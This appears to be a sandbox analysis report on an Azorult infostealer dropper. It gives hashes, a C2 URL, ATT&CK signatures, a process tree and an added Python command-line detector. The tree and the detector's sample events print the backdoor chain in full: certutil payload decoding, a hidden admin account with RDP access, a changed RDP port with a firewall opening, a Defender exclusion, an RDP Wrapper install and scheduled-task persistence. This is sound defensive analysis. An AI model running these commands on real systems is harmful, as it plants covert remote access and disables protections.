Analysis

  • max time kernel
    130s
  • max time network
    105s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240708-en locale:en-us os:windows7-x64 system
  • submitted
    22-12-2024 18:16

General

  • Target

    c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe

  • Size

    3.2MB

  • MD5

    7aaa757fa6b13340fa16c6c7eebb0c0f

  • SHA1

    3ea1381da382411231389c8be2c1117310a8efe0

  • SHA256

    c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07

  • SHA512

    1e372f60f5262742435ed5fddca5cf01362497b930ca614e30e3661defa74c8e2d8934926b94ae94f94c42b6d6e972afb0c3dfddb5bf7b928c4c7accc21ebe53

  • SSDEEP

    98304:i1Eu7EywnDEADZ6dly16EOM8RvFs4j25wcMIn:i1ERNnDEAFwM16E+RvFs4j8w+n

Malware Config

Extracted

Family

azorult

C2

http://0-800-email.com/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Grants admin privileges 1 TTPs

    Uses net.exe to add the newly created account to the local Administrators group.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment. Triggered here by adding the new account to the Remote Desktop Users group.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell (Add-MpPreference) to add Windows Defender exclusions for file extensions, paths or processes. Here the whole Program Files directory is excluded, which is where RDP Wrapper is installed afterwards.

  • Modifies RDP port number used by Windows 1 TTPs

    Sets the RDP-Tcp PortNumber value to 13389 and opens that port with an inbound firewall rule.

  • Modifies Windows Firewall 2 TTPs 6 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

    RDPWInst.exe installs RDP Wrapper, which points the TermService service at its own rdpwrap.dll (see the reg query for TermService\Parameters in the process tree).
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and browsing history.

  • Deobfuscate/Decode Files or Information 1 TTPs 3 IoCs

    Payload decoded via CertUtil.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network. The call here is net accounts /maxpwage:unlimited, which changes the policy rather than reading it, so the password of the new account never expires.

  • Drops file in System32 directory 12 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utility to control services on the system. Used here by the RDP Wrapper autoupdate script to query the state of TermService.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. The tree only shows netsh being used to add and delete firewall rules; no helper DLL registration is visible.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings. Here wmic resolves the well-known SIDs S-1-5-32-544 and S-1-5-32-555 to the local names of the Administrators and Remote Desktop Users groups before the net localgroup calls.

  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host. It fires on almost every process in this run, so on its own it carries little signal.

  • Delays execution with timeout.exe 3 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
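The batch file KfFhiFEm.bat (run from the process tree below) is a fixed sequence of built-in Windows commands, which makes the chain easy to catch from process-creation telemetry. What follows is an added example, not part of this report or of the sample: a small Python rule set that matches those command lines as Sysmon Event ID 1 or Security 4688 would record them, and only returns the combined verdict when a new account is given RDP access and the listener is exposed in the same batch of events. The rule names, the chain logic and the event list are assumptions of this example; the malicious command lines in SAMPLE_EVENTS are copied from the tree below, and the two benign lines are constructed to show what must not fire.

```python
"""Command-line detection for the account and RDP backdoor chain in this report.

Added example, not part of the sandbox report or the malware. Input is one
process command line per event, as Sysmon Event ID 1 or Security 4688 carry it.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class Rule:
    technique: str
    pattern: re.Pattern


# Each pattern keys on the tool plus the flag that makes it dangerous, never on
# the sample's random account name, so a renamed variant still fires.
RULES = (
    Rule("local account created",
         re.compile(r'\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b', re.I)),
    Rule("account added to Administrators",
         re.compile(r'\bnet1?(\.exe)?\s+localgroup\s+"?Administrators"?\s+\S+\s+/add\b', re.I)),
    Rule("account added to Remote Desktop Users",
         re.compile(r'\bnet1?(\.exe)?\s+localgroup\s+"?Remote Desktop Users"?\s+\S+\s+/add\b', re.I)),
    Rule("password expiry disabled",
         re.compile(r'\bnet1?(\.exe)?\s+accounts\s+/maxpwage:unlimited\b', re.I)),
    Rule("account hidden from logon screen",
         re.compile(r'Winlogon\\SpecialAccounts\\UserList\W.*/d\s+"?0+"?(\s|$)', re.I)),
    Rule("RDP listener port changed",
         re.compile(r'WinStations\\RDP-Tcp\W.*/v\s+"?PortNumber"?', re.I)),
    Rule("RDP security layer or encryption lowered",
         re.compile(r'WinStations\\RDP-Tcp\W.*/v\s+(SecurityLayer|MinEncryptionLevel)\b', re.I)),
    Rule("inbound firewall rule added",
         re.compile(r'\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\bdir=in\b', re.I)),
    Rule("Defender exclusion added",
         re.compile(r'\bAdd-MpPreference\b.*-Exclusion(Path|Extension|Process)\b', re.I)),
    Rule("certutil used as a decoder",
         re.compile(r'\bcertutil(\.exe)?"?\s+-decode\b', re.I)),
    Rule("RDP Wrapper installed",
         re.compile(r'RDPWInst(\.exe)?"?\s+-i\b', re.I)),
    Rule("scheduled task created from XML",
         re.compile(r'\bschtasks(\.exe)?\s+/Create\s+/XML\b', re.I)),
)


def scan(events: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (technique, command line) for every rule hit, in event order."""
    hits: List[Tuple[str, str]] = []
    for cmd in events:
        hits.extend((rule.technique, cmd) for rule in RULES if rule.pattern.search(cmd))
    return hits


# Any single technique can be an administrator at work. The combination below,
# which is what the batch file in this report runs, is the thing to alert on.
CHAIN_REQUIRED = frozenset({"local account created", "account added to Remote Desktop Users"})
CHAIN_EXPOSURE = frozenset({"RDP listener port changed", "inbound firewall rule added",
                            "RDP Wrapper installed"})


def is_rdp_backdoor(hits: List[Tuple[str, str]]) -> bool:
    """True when a fresh account is granted RDP and the listener is opened up."""
    seen = {technique for technique, _ in hits}
    return CHAIN_REQUIRED <= seen and bool(CHAIN_EXPOSURE & seen)


# Constructed sample: the malicious lines are copied from the process tree in
# this report; the last two are benign administrative commands that must not fire.
SAMPLE_EVENTS = [
    r'net user MENVELaJIp iFxgLSBWge /add',
    r'net localgroup Administrators MENVELaJIp /add',
    r'C:\Windows\system32\net1 localgroup "Remote Desktop Users" MENVELaJIp /add',
    r'net accounts /maxpwage:unlimited',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f',
    r'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f',
    r'netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389',
    r'powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"',
    r'"C:\Windows\System32\certutil.exe" -decode dera deras',
    r'"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o',
    r'net user',
    r'netsh advfirewall firewall show rule name=all',
]

if __name__ == "__main__":
    findings = scan(SAMPLE_EVENTS)
    for technique, cmd in findings:
        print(f"{technique:42} {cmd}")
    print("RDP backdoor chain:", is_rdp_backdoor(findings))
```

The chain check deliberately needs both an account grant and an exposure step: `net user /add` followed by `net localgroup "Remote Desktop Users"` is something a help desk does, while the same two commands next to a PortNumber change, a new inbound rule or an RDPWInst.exe install is not.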

Processes

  • C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
    "C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2116
    • C:\Windows\SysWOW64\certutil.exe
      "C:\Windows\System32\certutil.exe" -decode dera deras
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      PID:2764
    • C:\Windows\SysWOW64\certutil.exe
      "C:\Windows\System32\certutil.exe" -decode sfera sferas
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      PID:2708
    • C:\Windows\SysWOW64\certutil.exe
      "C:\Windows\System32\certutil.exe" -decode bruto brutos
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      PID:2924
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" deras
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3000
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" brutos
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\CLNT.vbs" "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat" "C:\Users\Admin\AppData\Roaming\jJF.dll"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\SysWOW64\cscript.exe
            cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\CLNT.vbs" "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat" "C:\Users\Admin\AppData\Roaming\jJF.dll"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn BsqsRhUj
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1708
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn BsqsRhUj
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" "{7FB22DB6-7827-4FED-A97A-E3C32288467B}" "C:\Users\Admin\AppData\Roaming\jJF.dll"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1496
          • C:\Windows\SysWOW64\cscript.exe
            cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" "{7FB22DB6-7827-4FED-A97A-E3C32288467B}" "C:\Users\Admin\AppData\Roaming\jJF.dll"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2168
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn OqlIVbcp
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2184
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn OqlIVbcp
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\aYOPKyHNFQ.bat MENVELaJIp iFxgLSBWge"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2952
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2392
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic group where sid="S-1-5-32-544" get name /value
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2164
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1032
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic group where sid="S-1-5-32-555" get name /value
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1072
          • C:\Windows\SysWOW64\net.exe
            net user MENVELaJIp iFxgLSBWge /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:780
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 user MENVELaJIp iFxgLSBWge /add
              6⤵
              • System Location Discovery: System Language Discovery
              PID:828
          • C:\Windows\SysWOW64\net.exe
            net localgroup Administrators MENVELaJIp /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:940
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup Administrators MENVELaJIp /add
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1848
          • C:\Windows\SysWOW64\net.exe
            net localgroup "Remote Desktop Users" MENVELaJIp /add
            5⤵
            • Remote Service Session Hijacking: RDP Hijacking
            • System Location Discovery: System Language Discovery
            PID:896
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup "Remote Desktop Users" MENVELaJIp /add
              6⤵
              • Remote Service Session Hijacking: RDP Hijacking
              • System Location Discovery: System Language Discovery
              PID:832
          • C:\Windows\SysWOW64\net.exe
            net accounts /maxpwage:unlimited
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1532
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 accounts /maxpwage:unlimited
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2320
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f
            5⤵
            • Hide Artifacts: Hidden Users
            • System Location Discovery: System Language Discovery
            PID:2196
          • C:\Windows\SysWOW64\reg.exe
            reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2940
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1372
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:768
          • C:\Windows\SysWOW64\timeout.exe
            Timeout /t 15
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:352
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\autoupdate.bat"
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1784
          • C:\Windows\SysWOW64\fsutil.exe
            fsutil dirty query C:
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2060
          • C:\Windows\SysWOW64\sc.exe
            sc queryex "TermService"
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2920
          • C:\Windows\SysWOW64\find.exe
            find "STATE"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1324
          • C:\Windows\SysWOW64\find.exe
            find /v "RUNNING"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1564
          • C:\Program Files\RDP Wrapper\RDPWInst.exe
            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1592
          • C:\Program Files\RDP Wrapper\RDPWInst.exe
            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
            5⤵
            • Server Software Component: Terminal Services DLL
            • Executes dropped EXE
            • Modifies WinLogon
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            PID:3036
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2284
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2900
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1708
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c query session rdp-tcp
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1896
          • C:\Program Files\RDP Wrapper\RDPWInst.exe
            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
            5⤵
            • Server Software Component: Terminal Services DLL
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2064
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall delete rule name="Remote Desktop"
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2856
          • C:\Program Files\RDP Wrapper\RDPWInst.exe
            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
            5⤵
            • Server Software Component: Terminal Services DLL
            • Executes dropped EXE
            • Modifies WinLogon
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            PID:992
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2552
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:752
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:280
          • C:\Windows\SysWOW64\reg.exe
            reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:324
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2240
            • C:\Windows\SysWOW64\cscript.exe
              cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1212
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1644
            • C:\Windows\SysWOW64\reg.exe
              reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:296
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:376
          • C:\Windows\SysWOW64\findstr.exe
            findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2980
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" sferas
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
        3⤵
        • Executes dropped EXE
        PID:2444
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService
    1⤵
    • Loads dropped DLL
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: LoadsDriver
    PID:1568
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {3971B318-4712-46E1-A4B0-0A3301C46688} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
    1⤵
    PID:320
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\CLNT.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat"
      2⤵
      PID:1344
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat
        3⤵
        • Drops file in System32 directory
        PID:2120
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
          4⤵
          PID:2780
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic group where sid="S-1-5-32-544" get name /value
            5⤵
            PID:2644
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
          4⤵
          PID:796
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic group where sid="S-1-5-32-555" get name /value
            5⤵
            PID:1496
        • C:\Windows\system32\net.exe
          net user MENVELaJIp iFxgLSBWge /add
          4⤵
          PID:1204
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user MENVELaJIp iFxgLSBWge /add
            5⤵
            PID:2020
        • C:\Windows\system32\net.exe
          net localgroup Administrators MENVELaJIp /add
          4⤵
          PID:1308
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup Administrators MENVELaJIp /add
            5⤵
            PID:1036
        • C:\Windows\system32\net.exe
          net localgroup Remote Desktop Users MENVELaJIp /add
          4⤵
          PID:1300
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup Remote Desktop Users MENVELaJIp /add
            5⤵
            PID:1068
        • C:\Windows\system32\net.exe
          net accounts /maxpwage:unlimited
          4⤵
          PID:2356
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 accounts /maxpwage:unlimited
            5⤵
            PID:1740
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f
          4⤵
          • Hide Artifacts: Hidden Users
          PID:2180
        • C:\Windows\system32\reg.exe
          reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
          4⤵
          PID:700
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2940
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          PID:1540
        • C:\Windows\system32\timeout.exe
          Timeout /t 15
          4⤵
          • Delays execution with timeout.exe
          PID:2444
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" MENVELaJIp iFxgLSBWge "{7FB22DB6-7827-4FED-A97A-E3C32288467B}"
      2⤵
      • Blocklisted process makes network request
      PID:2416
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" MENVELaJIp iFxgLSBWge "{7FB22DB6-7827-4FED-A97A-E3C32288467B}"
      2⤵
      • Blocklisted process makes network request
      PID:804
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\CLNT.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat"
      2⤵
      PID:1776
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat
        3⤵
        • Drops file in System32 directory
        PID:2308
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
          4⤵
          PID:2948
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic group where sid="S-1-5-32-544" get name /value
            5⤵
            PID:2932
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
          4⤵
          PID:2704
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic group where sid="S-1-5-32-555" get name /value
            5⤵
            PID:2672
        • C:\Windows\system32\net.exe
          net user MENVELaJIp iFxgLSBWge /add
          4⤵
          PID:2552
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user MENVELaJIp iFxgLSBWge /add
            5⤵
            PID:1164
        • C:\Windows\system32\net.exe
          net localgroup Administrators MENVELaJIp /add
          4⤵
          PID:1848
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup Administrators MENVELaJIp /add
            5⤵
            PID:1720
        • C:\Windows\system32\net.exe
          net localgroup Remote Desktop Users MENVELaJIp /add
          4⤵
          PID:992
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup Remote Desktop Users MENVELaJIp /add
            5⤵
            PID:752
        • C:\Windows\system32\net.exe
          net accounts /maxpwage:unlimited
          4⤵
          PID:324
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 accounts /maxpwage:unlimited
            5⤵
            PID:288
        • C:\Windows\system32\reg.exe
